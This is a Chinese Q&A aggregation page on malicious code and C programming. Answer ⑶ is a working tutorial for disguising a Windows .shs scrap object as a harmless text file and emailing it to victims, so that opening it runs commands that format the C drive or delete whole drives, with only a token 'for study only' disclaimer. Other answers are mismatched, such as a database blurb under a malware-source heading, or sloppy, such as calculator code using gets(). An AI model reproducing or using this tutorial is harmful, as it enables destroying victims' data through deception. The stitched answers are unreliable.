⑴ 关于恶意代码
用木马专杀试试吧!我一直在用挺好的,记得要经常升级杀啊!
⑵ 信息安全分析题,哪位大神帮忙解下,c语言的!
缓冲区溢出攻击。
strcpy(output, name);
因为output的容量仅仅为8字节,而name长度为27。这样的字符串拷贝将覆盖8字节外的内存区域,也就是附近的堆栈地址空间,导致意外修改内存区域。而当覆盖信息是精心设计的代码内容时,则会导致执行恶意代码!结果你懂得~
⑶ 如何制作一个恶意代码
下面我就将恶意程序的制作方法教给大家:
1.创建一个只包含一个空格(为了减小文件体积)的文本文件,任意取名。
2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后点击“浏览”按钮选择要插入的文件。
3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在弹出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令:start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示出命令内容。
4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一个图标。
5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名称)。点击“文件”菜单中的“更新”,然后关闭此对话框。
6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默认名为"片段"),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作为附件发出。
7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt”(如前文所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符根据实际情况自定义);如果替换为:start.exe /m deltree /y c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当然大家可以改成其它的命令)
(切记:仅供学习与研究,切莫用来攻击他人,更不要在没有安全准备的情况下执行上面的文件,呵呵!)
⑷ C或C++恶意代码源程序
数据库是Linux应用中的主要部分。Linux上的主要数据库包括:商业数据库: Oracle、Sybase、DB2、Informix;自由软件数据库: Mysql、PostgreSQL、Msql等。
⑸ c语言编程实例复杂点的!百度上的都是错,帮帮忙!
#include <stdio.h> /*库函数*/ struct s_node { int data; struct s_node *next; }; typedef struct s_node s_list; typedef s_list *link; link operator=NULL; link operand=NULL; link push(link stack,int value) { link newnode; newnode=(link) malloc(sizeof(s_list)); if(!newnode) { printf("\nMemory allocation failure!!!"); return NULL; } newnode->data=value; newnode->next=stack; stack=newnode; return stack; } link pop(link stack,int *value) { link top; if(stack !=NULL) { top=stack; stack=stack->next; *value=top->data; free(top); return stack; } else *value=-1; } int empty(link stack) { if(stack==NULL) return 1; else return 0; } int is_operator(char operator) { switch (operator) { case '+': case '-': case '*': case '/': return 1; default:return 0; } } int priority(char operator) { switch(operator) { case '+': case '-' : return 1; case '*': case '/' : return 2; default: return 0; } } int two_result(int operator,int operand1,int operand2) { switch(operator) { case '+':return(operand2+operand1); case '-':return(operand2-operand1); case '*':return(operand2*operand1); case '/':return(operand2/operand1); } } void main() { char expression[50]; int position=0; int op=0; int operand1=0; int operand2=0; int evaluate=0; printf("\nPlease input the inorder expression:"); gets(expression); while(expression[position]!='\0'&&expression[position]!='\n') { if(is_operator(expression[position])) { if(!empty(operator)) while(priority(expression[position])<= priority(operator->data)&& !empty(operator)) { operand=pop(operand,&operand1); operand=pop(operand,&operand2); operator=pop(operator,&op); operand=push(operand,two_result(op,operand1,operand2)); } operator=push(operator,expression[position]); } else operand=push(operand,expression[position]-48); position++; } while(!empty(operator)) { operator=pop(operator,&op); operand=pop(operand,&operand1); operand=pop(operand,&operand2); operand=push(operand,two_result(op,operand1,operand2)); } operand=pop(operand,&evaluate); printf("The expression [%s] result is '%d' ",expression,evaluate); getch(); } 这是用来编计算器的
⑹ 受流氓软件侵害的朋友给几个实例
比如.系统不稳定.经常无缘无故CPU占用率100%.